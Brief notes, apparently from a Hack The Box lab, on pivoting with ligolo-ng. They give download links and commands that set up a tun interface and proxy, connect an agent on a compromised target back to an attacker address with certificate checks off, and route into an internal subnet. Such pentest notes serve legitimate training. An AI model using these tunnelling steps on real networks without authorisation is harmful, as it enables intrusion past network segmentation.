linux agent:
https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_linux_amd64.tar.gz

windows agent:
https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_windows_amd64.zip

proxy server:
https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz

sudo ip tuntap add user htb-ac-2159563 mode tun ligolo

ip tuntap show

sudo ip link set ligolo up

./proxy -selfcert



in target:

./agent -connect 10.10.14.182:11601 -ignore-cert

in kali:

session

other terminal:

sudo ip route add 172.16.119.0/24 dev ligolo

ip route list
